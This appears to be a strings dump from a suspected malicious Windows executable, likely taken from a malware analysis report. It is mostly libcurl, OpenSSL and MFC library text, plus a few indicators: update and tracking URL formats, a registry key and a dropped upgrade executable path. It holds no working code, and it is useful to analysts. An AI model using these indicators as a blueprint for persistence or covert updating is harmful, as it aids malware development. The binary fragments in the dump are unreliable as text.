%8x-%4x-%4x-%2x%2x-%2x%2x%2x%2x%2x%2x
%s-%s
%s: %d
%s: %s
HttpOpenRequest failed: %lu
HttpSendRequest failed: %lu
SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList
4294967295
user32.dll
%s\%s
X-X-X-X-X-X
upd_url_format
trace_url_format
reg_supd_key
Software\Wnkey
%Documents and Settings%\%current user%\Local Settings\Application Data\gmsd_re_005010077\upgmsd_re_005010077.exe
All Files (*.*)
No error message is available.#Attempted an unsupported operation.$A required resource was unavailable.
Command failed.)Insufficient memory to perform operation.PSystem registry entries have been removed and the INI file (if any) was deleted.BNot all of the system registry entries (or INI file) were removed.FThis program requires the file %s, which was not found on this system.tThis program is linked to the missing export %s in the file %s. This machine may have an incompatible version of %s.
Destination disk drive is full.5Unable to read from %1, it is opened by someone else.AUnable to write to %1, it is read-only or opened by someone else.1Encountered an unexpected error while reading %1.1Encountered an unexpected error while writing %1.
#Unable to load mail system support.
Note that if you choose to recover the auto-saved documents, you must explicitly save them to overwrite the original documents. If you choose to not recover the auto-saved versions, they will be deleted.fRecover the auto-saved documents
%s [Recovered]
gmsd_re_005010077.exe_1880:
.text
`.rdata
@.data
.rsrc
@.reloc
.FGy"
u&u
u.VWh
8sqliu
u.Wh\
 2 34 567
 %STUV
F><.tn>
SSSSh
tWSShW
tl9_ tgSSh
u$SShe
t'SShl
j%XtL9E
FtPW
SSh@B
FTCP
u.Ph,#n
tAHt.HHt
s%j.Zf
xSSSh
FTPjKS
FtPj;S
C.PjRV
8Y%u-
>.uEV
RR R!"RR#$RRRR%&'RRR(R)*R RRR,-.RR/0123RRRR4R5RRRRRRR6RRRRRR789:;?@ABCDERRRRFRRRRGHRRRRRIRRJKRRRRRLMRRRNNRRORRRRRRRRRPRRQL
!"EEE#E$Eî&E'()EEEE*EEEEEEEE EEEEEEEEEEEE,EE-.EEEEEEEEEEE/E0EEEEEEEEEEEEEE12EE345EE6789:EEEEEEEE;?EE@EEEEEABCEEEEED
%u$Vj%
tCPh
t.Gj:W
FTPG
FTPj
.EKSWU
SHA1 block transform for x86, CRYPTOGAMS by 
SHA256 block transform for x86, CRYPTOGAMS by 
DlSHA512 block transform for x86, CRYPTOGAMS by 
|$@3|$
Camellia for x86 by 
6-9'6-9'
$6.:$6.:
*?#1*?#1
>8$4,8$4,
AES for x86, CRYPTOGAMS by 
RC4 for x86, CRYPTOGAMS by 
Montgomery Multiplication for x86, CRYPTOGAMS by 
FtPS
CB_ColorKey
CB_Keydown
CB_Keyup
()$^.* ?[]|\-{},:=!
CNotSupportedException
RegOpenKeyTransactedW
RegCreateKeyTransactedW
RegDeleteKeyTransactedW
CCmdTarget
RegDeleteKeyExW
CMDITabProxyWnd
CMDIChildWndEx
CMDIFrameWndEx
CMDIChildWnd
CMDIFrameWnd
CMDIClientAreaWnd
CMFCToolBarsKeyboardPropertyPage
operator
GetProcessWindowStation
portuguese-brazilian
F%D,3
dbghelp.dll
%Y-%m-%dT%H:%M:%SZ
Could not resolve %s: %s; %s
getaddrinfo() failed for %s:%d; %s
init_resolve_thread() failed for %s; %s
About to connect() to %s%s port %ld (#%ld)
Connected to %s (%s) port %ld (#%ld)
IDN support not present, can't parse Unicode domains
Protocol %s not supported or disabled in libcurl
 malformed
:]://%[^
[^:]:%[^
http_proxy
%5[^:@]:%5[^@]
:%5[^@]
Port number too large: %lu
%s://%s%s%s:%hu%s%s%s
;type=%c
[%*45[0123456789abcdefABCDEF:.]%c
Couldn't find host %s in the _netrc file; using defaults
PTF@example.com
Couldn't resolve host '%s'
Couldn't resolve proxy '%s'
User-Agent: %s
Re-using existing connection! (#%ld) with host %s
%s://%s
Connection #%ld to host %s left intact
operation aborted by callback
ioctl callback returned error %d
the ioctl callback returned %d
seek callback returned error %d
Problem (%d) in the Chunked-Encoded data
HTTP server doesn't seem to support byte ranges. Cannot resume.
Excess found in a non pipelined read: excess = %zd url = %s (zero-length body)
Unrecognized content encoding type. libcurl understands `identity', `deflate' and `gzip' content encodings.
Excess found in a non pipelined read: excess = %zu, size = %lld, maxdownload = %lld, bytecount = %lld
Rewinding stream by : %zu bytes on url %s (size = %lld, maxdownload = %lld, bytecount = %lld, nread = %zd)
Rewinding stream by : %zd bytes on url %s (zero-length body)
Operation timed out after %ld milliseconds with %lld bytes received
Operation timed out after %ld milliseconds with %lld out of %lld bytes received
Added %s:%d:%s to DNS cache
Resolve %s found illegal!
%5[^:]:%d:%5s
No URL set!
[^?&/:]://%c
Violate RFC 2616/10.3.2 and switch from POST to GET
Violate RFC 2616/10.3.3 and switch from POST to GET
Disables POST, goes with %s
Issue another request to this URL: '%s'
unspecified error %d
%s cookie %s="%s" for domain %s, path %s, expire %lld
#HttpOnly_
skipped cookie with bad tailmatch domain: %s
skipped cookie with illegal dotcount domain: %s
httponly
23[^;
=]=I99[^;
%s%s%s
# Fatal libcurl error
# Netscape HTTP Cookie File
# hXXp://curl.haxx.se/rfc/cookie_spec.html
# This file was generated by libcurl! Edit at your own risk.
WARNING: failed to save cookies in %s
[%s %s %s]
Send failure: %s
Recv failure: %s
bind failed with errno %d: %s
Local port: %hu
getsockname() failed with errno %d: %s
Bind to local port %hu failed, trying next
Couldn't bind to '%s'
Name '%s' family %i resolved to '%s' family %i
Local Interface %s is ip %s using address family %i
ssloc inet_ntop() failed with errno %d: %s
ssrem inet_ntop() failed with errno %d: %s
getpeername() failed with errno %d: %s
TCP_NODELAY set
Could not set TCP_NODELAY: %s
Failed to connect to %s: %s
Trying %s...
sa_addr inet_ntop() failed with errno %d: %s
Unable to parse FTP file list
Error in the SSH layer
Caller must register CURLOPT_CONV_ callback options
TFTP: No such user
TFTP: Unknown transfer ID
TFTP: Illegal operation
TFTP: Access Violation
TFTP: File Not Found
Login denied
Issuer check against peer certificate failed
Invalid LDAP URL
Unrecognized or bad HTTP Content or Transfer-Encoding
Problem with the SSL CA cert (path? access rights?)
Peer certificate cannot be authenticated with given CA certificates
Problem with the local SSL certificate
SSL peer certificate or SSH remote key was not OK
An unknown option was passed in to libcurl
A libcurl function was given a bad argument
Operation was aborted by an application callback
FTP: command REST failed
FTP: command PORT failed
HTTP response code said error
FTP: couldn't retrieve (RETR failed) the specified file
FTP: couldn't set file type
FTP: can't figure out the host in the PASV response
FTP: unknown 227 response format
FTP: unknown PASV reply
FTP: unknown PASS reply
FTP: The server did not accept the PRET command.
FTP: weird server reply
A requested feature, protocol or option was not found built-in in this libcurl due to a build-time decision.
URL using bad/illegal format or missing URL
Unsupported protocol
Winsock version not supported
Protocol family not supported
Address family not supported
Operation not supported
Socket is unsupported
Protocol is unsupported
Protocol option is unsupported
Unknown error %d (%#x)
Internal error removing splay node = %d
Internal error clearing splay node = %d
libcurl is now using a weak random seed!
not supported file type '%s' for certificate
file type P12 for certificate not supported
file type ENG for certificate not implemented
not supported file type for private key
Private key does not match the certificate public key
file type P12 for private key not supported
file type ENG for private key not supported
unable to set private key file: '%s' type %s
unable to use client certificate (no key found or wrong pass phrase?)
SSL Engine not supported
select/poll on SSL socket, errno: %d
SSL read: %s, errno %d
d-d-d d:d:d %s
common name: %s (matched)
common name: %s (does not match '%s')
SSL: certificate subject name '%s' does not match target host name '%s'
SSL: unable to obtain common name from peer certificate
SSL: illegal cert name field
subjectAltName does not match %s
subjectAltName: %s matched
CERT verify
Client key exchange
Server key exchange
CERT
Client CERT
Request CERT
Client key
SSLv%c, %s%s (%d):
SSL: SSL_set_fd failed: %s
SSL: SSL_set_session failed: %s
error loading CRL file: %s
CRLfile: %s
CAfile: %s
CApath: %s
successfully set certificate verify locations:
error setting certificate verify locations, continuing anyway:
error setting certificate verify locations:
SSL: couldn't create a context: %s
SSL connection using %s
SSL certificate problem, verify that the CA cert is OK. Details:
Unknown SSL protocol error in connection to %s:%ld
%s: %s
x:
%s(%s)
%s: %s
Signature: %s
Cert
RSA Public Key
RSA Public Key (%d bits)
pub_key
priv_key
Unable to load public key
Public Key Algorithm
Public Key Algorithm: %s
Expire date: %s
Start date: %s
Serial Number: %s
x%c
Signature Algorithm: %s
Issuer: %s
- Subject: %s
--- Certificate chain
SSL certificate verify ok.
SSL certificate verify result: %s (%ld), continuing anyway.
SSL certificate verify result: %s (%ld)
SSL certificate issuer check ok (%s)
SSL: Certificate issuer check failed (%s)
SSL: Unable to read issuer cert (%s)
SSL: Unable to open issuer cert (%s)
issuer: %s
expire date: %s
start date: %s
subject: %s
Server certificate:
SSL: couldn't get peer certificate!
SSL_write() return error %d
SSL_write() error: %s
SSL_write() returned SYSCALL, errno = %d
--:--:--
%3lld %s %3lld %s %3lld %s %s %s %s %s %s %s
%s%s%s%s%s%s
Session: %s
%s %s RTSP/1.0
Range: %s
Referer: %s
Accept-Encoding: %s
Refusing to issue an RTSP SETUP without a Transport: header.
Transport: %s
Transport:
Refusing to issue an RTSP request [%s] without a session ID.
Got RTSP Session ID Line [%s], but wanted ID [%s]
Unable to read the CSeq header: [%s]
SMTPS
SMTP
EHLO %s
HELO %s
AUTH %s
No known auth mechanisms supported!
AUTH %s %s
LOGIN
Access denied: %d
%s xxxxxxxxxxxxxxxx
Authentication failed: %d
MAIL FROM:
MAIL FROM:%s
RCPT TO:
RCPT TO:%s
STARTTLS denied. %c
Got unexpected smtp-server response: %d
USER %s
PASS %s
Access denied. %c
Invalid message. %c
RETR %s
LIST %s
%s LOGIN %s %s
%s SELECT %s
%s FETCH 1 BODY[TEXT]
%s LOGOUT
%s STARTTLS
TFTP
set timeouts for state %d; Total %ld, retry %d maxtry %d
invalid tsize -:%s:- value in OACK packet
%s (%ld)
blksize is smaller than min supported
%s (%d)
blksize is larger than max supported
%s (%d) %s (%d)
got option=(%s) value=(%s)
tftp_rx: internal error
Timeout waiting for block %d ACK. Retries = %d
tftp_rx: giving up waiting for block %d
Received unexpected DATA packet block %d
tftp_tx: internal error, event: %i
tftp_tx: giving up waiting for block %d ack
Received ACK for block %d, expecting %d
bind() failed; %s
tftp_send_first: internal error
%s%c%s%c
TFTP finished
TFTP response timeout
Can't get the size of %s
Can't open %s for writing
Last-Modified: %s, d %s M d:d:d GMT
Couldn't open file %s
There are more than %d entries
LDAP remote: %s
LDAP local: ldap_simple_bind_s %s
LDAP local: Cannot connect to %s:%hu
LDAP local: trying to establish %s connection
LDAP local: %s
LDAP local: LDAP Vendor = %s ; LDAP Version = %d
CLIENT libcurl 7.22.0
MATCH %s %s %s
DEFINE %s %s
insufficient winsock version to support telnet
WSAStartup failed (%d)
%s %d %d
%s %s %d
%s %s %s
%s IAC %d
%s IAC %s
Sending data failed (%d)
%d (unknown)
%s (unsupported)
%s IAC SB
Syntax error in telnet option: %s
Unknown telnet option %s
7[^= ]%*[ =]%5s
USER,%s
%c%c%c%c%s%c%c
%c%s%c%s
7[^,],7s
%c%c%c%c
FreeLibrary(wsock2) failed (%d)
WSACloseEvent failed (%d)
WSAEnumNetworkEvents failed (%d)
WSACreateEvent failed (%d)
failed to find WSAEnumNetworkEvents function (%d)
failed to find WSAEventSelect function (%d)
failed to find WSACloseEvent function (%d)
failed to find WSACreateEvent function (%d)
failed to load WS2_32.DLL (%d)
WS2_32.DLL
FTPS
PORT
FTP response aborted due to select/poll error: %d
FTP response timeout
%s %s
,%d,%d
%s |%d|%s|%hu|
bind() failed, we ran out of ports!
bind(port=%hu) failed: %s
socket failure: %s
Curl_resolv failed, we can not recover!
getsockname() failed: %s
Connect data stream passively
PRET RETR %s
PRET STOR %s
PRET %s
REST %d
SIZE %s
STOR %s
APPE %s
Failed to do PORT
Got a d response code instead of the assumed 200
ftp server doesn't support SIZE
Failed FTP upload: 
RETR response: d
PBSZ %d
Access denied: d
ACCT %s
ACCT rejected by server: d
TYPE %c
Connecting to %s (%s) port %d
Uploading to a URL without a file name!
MDTM %s
Bad PASV/EPSV response: d
Can't resolve new host %s:%hu
Can't resolve proxy host %s:%hu
Skips %d.%d.%d.%d for data connection, uses %s instead
%d,%d,%d,%d,%d,%d
%c%c%c%u%c
ddd d:d:d GMT
dddddd
unsupported MDTM reply format
QUOT string not accepted: %s
Wildcard - "%s" skipped by user
Wildcard - START of "%s"
CWD %s
PRET command not accepted: d
Failed to MKD dir: d
MKD %s
QUOT command failed with d
Entry path is '%s'
PROT %c
unsupported parameter to CURLOPT_FTPSSLAUTH: %d
Got a d ftp-server response when 220 was expected
server did not report OK, got %d
Remembering we are in dir "%s"
HTTPS
%sAuthorization: Basic %s
%s:%s
%s auth using %s with user '%s'
HTTP/
Avoided giant realloc for header (max is %d)!
The requested URL returned error: %d
If-Unmodified-Since: %s
Last-Modified: %s
If-Modified-Since: %s
%s, d %s M d:d:d GMT
Failed sending HTTP POST request
Content-Type: application/x-www-form-urlencoded
Internal HTTP POST error!
Failed sending HTTP request
%s%s=%s
%s HTTP/%s
%s%s%s%s%s%s%s%s%s%s%s
PTF://%s:%s@%s
Content-Range: bytes %s/%lld
Content-Range: bytes %s%lld/%lld
Range: bytes=%s
PTF://
Host: %s%s%s:%hu
Host: %s%s%s
Chunky upload is not supported by HTTP 1.0
%s, TE
HTTP error before end of send, stop sending
HTTP/1.0 connection set to keep alive!
HTTP/1.1 proxy connection set close!
HTTP/1.0 proxy connection set to keep alive!
HTTP 1.0, assume close after body
RTSP/%d.%d =
HTTP =
HTTP/%d.%d =
Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), Unknown.
Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected because the client program and identd report different user-ids.
Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected because SOCKS server cannot connect to identd on the client.
Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected or failed.
SOCKS4%s request granted.
Failed to resolve "%s" for SOCKS4 connect.
No authentication method was acceptable. (It is quite likely that the SOCKS5 server wanted a username/password, since none was supplied to the server on this connection.)
SOCKS5 GSSAPI per-message authentication is not supported.
Can't complete SOCKS5 connection to %d.%d.%d.%d:%d. (%d)
Failed to resolve "%s" for SOCKS5 connect.
User was rejected by the SOCKS5 server (%d %d).
password
login
Operation too slow. Less than %ld bytes/sec transferred the last %ld seconds
%sAuthorization: NTLM %s
%s, algorithm="%s"
%s, opaque="%s"
%sAuthorization: Digest username="%s", realm="%s", nonce="%s", uri="%s", response="%s"
%sAuthorization: Digest username="%s", realm="%s", nonce="%s", uri="%s", cnonce="%s", nc=x, qop="%s", response="%s"
%s:%s:x:%s:%s:%s
%s:%.*s
%s:%s:%s
Error while processing content unencoding: %s
1.2.0.4
d:d
%c%c==
%c%c%c=
Received HTTP code %d from proxy after CONNECT
HTTP/1.%d %d
CONNECT %s:%hu HTTP/%s
%s%s%s%s
Host: %s
%s:%hu
Establish HTTP proxy tunnel to %s:%hu
0123456789-
.jpeg
.html
--%s--
couldn't open file "%s"
Content-Type: %s
; filename="%s"
Content-Disposition: attachment; filename="%s"
Content-Type: multipart/mixed, boundary=%s
%s; boundary=%s
NTLMSSP%c
%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%s%s
%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c
KGS!@#$%.rnd
\X
X.509 part of OpenSSL 1.0.0e 6 Sep 2011
OPENSSL_ALLOW_PROXY_CERTS
passed a null parameter
DSO support routines
x509 certificate routines
error:lX:%s:%s:%s
ASN.1 part of OpenSSL 1.0.0e 6 Sep 2011
d.registeredID
d.iPAddress
d.uniformResourceIdentifier
d.ediPartyName
d.directoryName
d.dNSName
d.rfc822Name
d.otherName
Stack part of OpenSSL 1.0.0e 6 Sep 2011
x%s
%s - d:d:d%.*s %d%s
%*s
%*s%s
%*s%s:
CERTIFICATE
Big Number part of OpenSSL 1.0.0e 6 Sep 2011
unsupported or invalid name syntax
unsupported or invalid name constraint syntax
unsupported name constraint type
name constraints minimum and maximum not supported
Unsupported extension feature
invalid or inconsistent certificate policy extension
invalid or inconsistent certificate extension
key usage does not include digital signature
key usage does not include CRL signing
unable to get CRL issuer certificate
key usage does not include certificate signing
authority and subject key identifier mismatch
certificate rejected
certificate not trusted
unsupported certificate purpose
proxy certificates not allowed, please set the appropriate flag
invalid non-CA certificate (has CA markings)
invalid CA certificate
certificate revoked
certificate chain too long
unable to verify the first certificate
unable to get local issuer certificate
self signed certificate in certificate chain
self signed certificate
format error in certificate's notAfter field
format error in certificate's notBefore field
certificate has expired
certificate is not yet valid
certificate signature failure
unable to decode issuer public key
unable to decrypt certificate's signature
unable to get certificate CRL
unable to get issuer certificate
cert_info
OpenSSL 1.0.0e 6 Sep 2011
MD5 part of OpenSSL 1.0.0e 6 Sep 2011
libdes part of OpenSSL 1.0.0e 6 Sep 2011
DES part of OpenSSL 1.0.0e 6 Sep 2011
MD4 part of OpenSSL 1.0.0e 6 Sep 2011
RAND part of OpenSSL 1.0.0e 6 Sep 2011
You need to read the OpenSSL FAQ, hXXp://VVV.openssl.org/support/faq.html
RSA part of OpenSSL 1.0.0e 6 Sep 2011
DSA part of OpenSSL 1.0.0e 6 Sep 2011
.\crypto\ec\ec_key.c
Diffie-Hellman part of OpenSSL 1.0.0e 6 Sep 2011
supportedAlgorithms
crossCertificatePair
certificateRevocationList
cACertificate
userCertificate
userPassword
supportedApplicationContext
Microsoft Local Key set
LocalKeySet
id-Gost28147-89-None-KeyMeshing
id-Gost28147-89-CryptoPro-KeyMeshing
password based MAC
id-PasswordBasedMAC
X509v3 Certificate Issuer
certificateIssuer
certicom-arc
Proxy Certificate Information
proxyCertInfo
Microsoft Smartcardlogin
msSmartcardLogin
joint-iso-itu-t
JOINT-ISO-ITU-T
set-rootKeyThumb
setAttr-Cert
setCext-cCertRequired
setCext-certType
setct-CertResTBE
setct-CertReqTBEX
setct-CertReqTBE
setct-AcqCardCodeMsgTBE
setct-CertInqReqTBS
setct-CertResData
setct-CertReqTBS
setct-CertReqData
setct-PCertResTBS
setct-PCertReqData
setct-AcqCardCodeMsg
certificate extensions
set-certExt
set-msgExt
id-ecPublicKey
id-cmc-confirmCertAcceptance
id-cmc-getCert
id-regInfo-certReq
id-regCtrl-protocolEncrKey
id-regCtrl-oldCertID
id-it-revPassphrase
id-it-keyPairParamRep
id-it-keyPairParamReq
id-it-unsupportedOIDs
id-it-caKeyUpdateInfo
id-it-encKeyPairTypes
id-it-signKeyPairTypes
id-it-caProtEncCert
id-mod-attribute-cert
id-mod-qualified-cert-93
id-mod-qualified-cert-88
id-smime-aa-ets-certCRLTimestamp
id-smime-aa-ets-certValues
id-smime-aa-ets-CertificateRefs
id-smime-aa-ets-otherSigCert
id-smime-aa-smimeEncryptCerts
id-smime-aa-signingCertificate
id-smime-aa-encrypKeyPref
id-smime-aa-msgSigDigest
id-smime-ct-publishCert
id-smime-mod-msg-v3
sdsiCertificate
x509Certificate
localKeyID
certBag
pkcs8ShroudedKeyBag
keyBag
pbeWithSHA1And2-KeyTripleDES-CBC
pbeWithSHA1And3-KeyTripleDES-CBC
TLS Web Client Authentication
TLS Web Server Authentication
X509v3 Extended Key Usage
extendedKeyUsage
X509v3 Authority Key Identifier
authorityKeyIdentifier
X509v3 Certificate Policies
certificatePolicies
X509v3 Private Key Usage Period
privateKeyUsagePeriod
X509v3 Key Usage
keyUsage
X509v3 Subject Key Identifier
subjectKeyIdentifier
Netscape Certificate Sequence
nsCertSequence
Netscape CA Policy Url
nsCaPolicyUrl
Netscape Renewal Url
nsRenewalUrl
Netscape CA Revocation Url
nsCaRevocationUrl
Netscape Revocation Url
nsRevocationUrl
Netscape Base Url
nsBaseUrl
Netscape Cert Type
nsCertType
Netscape Certificate Extension
nsCertExt
extendedCertificateAttributes
challengePassword
dhKeyAgreement
value.single
value.set
ssl_sess_cert
ssl_cert
evp_pkey
x509_pkey
%s(%d): OpenSSL internal error, assertion failed: %s
X509_PUBKEY
public_key
.\crypto\asn1\x_pubkey.c
appl [ %d ]
cont [ %d ]
priv [ %d ]
'() ,-./:=?
%d.%d.%d.%d/%d.%d.%d.%d
ddddddZ
ddddddZ
lhash part of OpenSSL 1.0.0e 6 Sep 2011
TRUSTED CERTIFICATE
CERTIFICATE REQUEST
NEW CERTIFICATE REQUEST
RSA PRIVATE KEY
DSA PRIVATE KEY
EC PRIVATE KEY
X509 CERTIFICATE
/usr/local/ssl/certs
/usr/local/ssl/cert.pem
SSL_CERT_DIR
SSL_CERT_FILE
%lu:%s:%s:%d:%s
%sx - 
x -
PEM part of OpenSSL 1.0.0e 6 Sep 2011
phrase is too short, needs to be at least %d chars
Enter PEM pass phrase:
PRIVATE KEY
ENCRYPTED PRIVATE KEY
ANY PRIVATE KEY
name.relativename
name.fullname
certificateHold
Certificate Hold
cessationOfOperation
Cessation Of Operation
keyCompromise
Key Compromise
%*sOnly Attribute Certificates
%*sOnly CA Certificates
%*sOnly User Certificates
PROXY_CERT_INFO_EXTENSION
AUTHORITY_KEYID
keyid
X509_CERT_PAIR
X509_CERT_AUX
USER32.DLL
NETAPI32.DLL
KERNEL32.DLL
ADVAPI32.DLL
EC part of OpenSSL 1.0.0e 6 Sep 2011
.\crypto\dh\dh_key.c
%s: (%d bit)
Public-Key
Private-Key
recommended-private-length: %d bits
public-key:
private-key:
PKCS#3 DH Public-Key
PKCS#3 DH Private-Key
Public-Key: (%d bit)
Private-Key: (%d bit)
SHA1 part of OpenSSL 1.0.0e 6 Sep 2011
SHA-256 part of OpenSSL 1.0.0e 6 Sep 2011
SHA-512 part of OpenSSL 1.0.0e 6 Sep 2011
IP Address:%d.%d.%d.%d
URI:%s
DNS:%s
email:%s
EdiPartyName:
X400Name:
othername:
pubkey
enc_key
key_enc_algor
cert
d.encrypted
d.digest
d.signed_and_enveloped
d.enveloped
d.sign
d.data
d.other
EC_PRIVATEKEY
publicKey
privateKey
value.implicitlyCA
value.parameters
value.named_curve
p.char_two
p.prime
p.ppBasis
p.tpBasis
p.onBasis
p.other
PKCS8_PRIV_KEY_INFO
pkey
pkeyalg
.\crypto\evp\evp_pkey.c
keylen 
EVP_CIPHER_key_length(cipher) 
%*sPolicy Text: %s
%*scrlUrl:
EXTENDED_KEY_USAGE
%*sZone: %s, User:
.\crypto\x509v3\v3_akey.c
d.usernotice
d.cpsuri
CERTIFICATEPOLICIES
%*sExplicit Text: %s
%*sNumber%s:
%*sOrganization: %s
%*sCPS: %s
PKEY_USAGE_PERIOD
keyCertSign
Certificate Sign
keyAgreement
Key Agreement
keyEncipherment
Key Encipherment
.\crypto\x509v3\v3_skey.c
NETSCAPE_CERT_SEQUENCE
certs
.\crypto\pem\pem_pkey.c
.\crypto\asn1\x_pkey.c
.\crypto\evp\evp_key.c
nkey 
EVP part of OpenSSL 1.0.0e 6 Sep 2011
?456789:;
!"#$%&'()* ,-./0123
ECDSA part of OpenSSL 1.0.0e 6 Sep 2011
Basis Type: %s
Field Type: %s
ASN1 OID: %s
%s %s%lu (%s0x%lx)
hexkey
rsa_keygen_pubexp
rsa_keygen_bits
RIPE-MD160 part of OpenSSL 1.0.0e 6 Sep 2011
SHA part of OpenSSL 1.0.0e 6 Sep 2011
CAST part of OpenSSL 1.0.0e 6 Sep 2011
Blowfish part of OpenSSL 1.0.0e 6 Sep 2011
RC2 part of OpenSSL 1.0.0e 6 Sep 2011
.pp@0
aEÐ
 (#EÚ
ÚE
IDEA part of OpenSSL 1.0.0e 6 Sep 2011
len>=0 && lenkey)
j key)
keylength
keyfunc
.\crypto\pkcs12\p12_key.c
crlUrl
certStatus
certId
OCSP_CERTSTATUS
value.unknown
value.revoked
value.good
value.byKey
value.byName
reqCert
OCSP_CERTID
issuerKeyHash
CONF part of OpenSSL 1.0.0e 6 Sep 2011
%'%1$=%C%K%O%s%
.%.-.3.7.9.?.W.[.o.y.
C%C'C3C7C9COCWCiC
d.receiptList
d.allOrFirstTier
d.compressedData
d.authenticatedData
d.encryptedData
d.digestedData
d.envelopedData
d.signedData
d.ori
d.pwri
d.kekri
d.kari
d.ktri
CMS_PasswordRecipientInfo
keyDerivationAlgorithm
keyIdentifier
CMS_KeyAgreeRecipientInfo
recipientEncryptedKeys
CMS_OriginatorIdentifierOrKey
d.originatorKey
CMS_OriginatorPublicKey
CMS_RecipientEncryptedKey
CMS_KeyAgreeRecipientIdentifier
d.rKeyId
CMS_RecipientKeyIdentifier
CMS_OtherKeyAttribute
keyAttr
keyAttrId
CMS_KeyTransRecipientInfo
encryptedKey
keyEncryptionAlgorithm
certificates
d.crl
d.subjectKeyIdentifier
d.issuerAndSerialNumber
CMS_CertificateChoices
d.v2AttrCert
d.v1AttrCert
d.extendedCertificate
d.certificate
CMS_OtherCertificateFormat
otherCert
otherCertFormat
CONF_def part of OpenSSL 1.0.0e 6 Sep 2011
[[%s]]
[%s] %s=%s
Verifying - %s
ECDH part of OpenSSL 1.0.0e 6 Sep 2011
value.bag
value.safes
value.shkeybag
value.keybag
value.sdsicert
value.x509cert
value.other
%s.dll
%-23s %s Kx=%-8s Au=%-4s Enc=%-9s Mac=%-4s%s
EXPORT56
EXPORT40
EXPORT
.\ssl\ssl_cert.c
wrong number of key bits
unsupported status type
unsupported ssl version
unsupported protocol
unsupported elliptic curve
unsupported digest type
unsupported compression algorithm
unsupported cipher
unknown pkey type
unknown key exchange type
unknown certificate type
unable to find public key parameters
unable to extract public key
unable to decode ecdh certs
unable to decode dh certs
tried to use unsupported cipher
tls peer did not respond with certificate list
tls client cert req with anon cipher
tlsv1 unsupported extension
tlsv1 certificate unobtainable
tlsv1 bad certificate status response
tlsv1 bad certificate hash value
tlsv1 alert export restriction
sslv3 alert unsupported certificate
sslv3 alert no certificate
sslv3 alert certificate unknown
sslv3 alert certificate revoked
sslv3 alert certificate expired
sslv3 alert bad certificate
signature for non signing certificate
reuse cert type not zero
reuse cert length not zero
public key not rsa
public key is not rsa
public key encrypt error
peer error unsupported certificate type
peer error no certificate
peer error certificate
peer did not return a certificate
null ssl method passed
no publickey
no private key assigned
no privatekey
Peer haven't sent GOST certificate, required for selected ciphersuite
no client cert received
no client cert method
no ciphers passed
no certificate specified
no certificate set
no certificate returned
no certificate assigned
no certificates returned
missing tmp rsa pkey
missing tmp rsa key
missing tmp ecdh key
missing tmp dh key
missing rsa signing cert
missing rsa encrypting cert
missing rsa certificate
missing export tmp rsa key
missing export tmp dh key
missing dsa signing cert
missing dh rsa cert
missing dh key
missing dh dsa cert
krb5 server rd_req (keytab perms?)
key arg too long
invalid ticket keys length
http request
https proxy request
error generating tmp rsa key
ecc cert should have sha1 signature
ecc cert should have rsa signature
ecc cert not for signing
ecc cert not for key agreement
cert length mismatch
certificate verify failed
bad ecc cert
bad dh pub key length
TLS1_SETUP_KEY_BLOCK
tls1_cert_verify_mac
SSL_VERIFY_CERT_CHAIN
SSL_use_RSAPrivateKey_file
SSL_use_RSAPrivateKey_ASN1
SSL_use_RSAPrivateKey
SSL_use_PrivateKey_file
SSL_use_PrivateKey_ASN1
SSL_use_PrivateKey
SSL_use_certificate_file
SSL_use_certificate_ASN1
SSL_use_certificate
SSL_SET_PKEY
SSL_SET_CERT
SSL_SESS_CERT_NEW
SSL_GET_SIGN_PKEY
SSL_GET_SERVER_SEND_CERT
SSL_CTX_use_RSAPrivateKey_file
SSL_CTX_use_RSAPrivateKey_ASN1
SSL_CTX_use_RSAPrivateKey
SSL_CTX_use_PrivateKey_file
SSL_CTX_use_PrivateKey_ASN1
SSL_CTX_use_PrivateKey
SSL_CTX_use_certificate_file
SSL_CTX_use_certificate_chain_file
SSL_CTX_use_certificate_ASN1
SSL_CTX_use_certificate
SSL_CTX_set_client_cert_engine
SSL_CTX_check_private_key
SSL_CHECK_SRVR_ECC_CERT_AND_ALG
SSL_check_private_key
SSL_CERT_NEW
SSL_CERT_INSTANTIATE
SSL_CERT_INST
SSL_CERT_DUP
SSL_add_file_cert_subjects_to_stack
SSL_add_dir_cert_subjects_to_stack
SSL3_SETUP_KEY_BLOCK
SSL3_SEND_SERVER_KEY_EXCHANGE
SSL3_SEND_SERVER_CERTIFICATE
SSL3_SEND_CLIENT_KEY_EXCHANGE
SSL3_SEND_CLIENT_CERTIFICATE
SSL3_SEND_CERTIFICATE_REQUEST
SSL3_OUTPUT_CERT_CHAIN
SSL3_GET_SERVER_CERTIFICATE
SSL3_GET_KEY_EXCHANGE
SSL3_GET_CLIENT_KEY_EXCHANGE
SSL3_GET_CLIENT_CERTIFICATE
SSL3_GET_CERT_VERIFY
SSL3_GET_CERT_STATUS
SSL3_GET_CERTIFICATE_REQUEST
SSL3_GENERATE_KEY_BLOCK
SSL3_CHECK_CERT_AND_ALGORITHM
SSL3_ADD_CERT_TO_BUF
SSL2_SET_CERTIFICATE
SSL2_GENERATE_KEY_MATERIAL
REQUEST_CERTIFICATE
GET_CLIENT_MASTER_KEY
DTLS1_SEND_SERVER_KEY_EXCHANGE
DTLS1_SEND_SERVER_CERTIFICATE
DTLS1_SEND_CLIENT_KEY_EXCHANGE
DTLS1_SEND_CLIENT_CERTIFICATE
DTLS1_SEND_CERTIFICATE_REQUEST
DTLS1_OUTPUT_CERT_CHAIN
DTLS1_ADD_CERT_TO_BUF
CLIENT_MASTER_KEY
CLIENT_CERTIFICATE
TLSv1 part of OpenSSL 1.0.0e 6 Sep 2011
SSLv3 part of OpenSSL 1.0.0e 6 Sep 2011
SSLv2 part of OpenSSL 1.0.0e 6 Sep 2011
s->session->master_key_length >= 0 && s->session->master_key_length session->master_key)
c->iv_len session->key_arg)
s->s2->key_material_length s2->key_material
key expansion
client write key
server write key
Visual C   CRT: Not enough memory to complete call to strerror.
Broken pipe
Inappropriate I/O control operation
Operation not permitted
